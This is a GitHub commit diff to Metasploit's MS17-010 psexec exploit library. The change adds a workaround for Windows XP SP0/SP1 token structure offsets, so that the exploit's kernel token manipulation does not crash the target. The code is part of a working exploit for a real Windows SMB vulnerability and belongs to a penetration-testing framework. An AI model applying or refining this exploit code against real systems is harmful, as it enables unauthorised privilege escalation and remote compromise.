Skip to content

Commit 7007bc1

Browse files
author
zerosum0x0
committed
hopefully fixed XP SP0/SP1 issues
1 parent cfb7aa6 commit 7007bc1

File tree

1 file changed

+20
-1
lines changed

1 file changed

+20
-1
lines changed

lib/msf/core/exploit/smb/client/psexec_ms17_010.rb

Lines changed: 20 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -124,6 +124,23 @@ def modify_token()
124124

125125
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
126126
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
127+
128+
if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
129+
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
130+
print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
131+
@ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
132+
@ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
133+
134+
userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
135+
userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
136+
137+
# hopefully its not bad anymore
138+
if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
139+
raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
140+
end
141+
end
142+
end
143+
127144
vprint_status("UserAndGroupCount: 0x#{userAndGroupCount.to_s}")
128145
vprint_status("UserAndGroupsAddr: 0x#{userAndGroupsAddr.to_s(16)}")
129146

@@ -183,7 +200,7 @@ def write_what_where(what, where)
183200

184201
def read_data(read_addr, read_size)
185202
if read_addr == 0
186-
raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
203+
raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
187204
end
188205

189206
fmt = @ctx['PTR_FMT']
@@ -1190,6 +1207,8 @@ def calc_alloc_size(size, align_size)
11901207
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
11911208
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
11921209
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
1210+
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
1211+
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
11931212
}
11941213

11951214
WIN2K_32_SESSION_INFO = {

0 commit comments

Comments
 (0)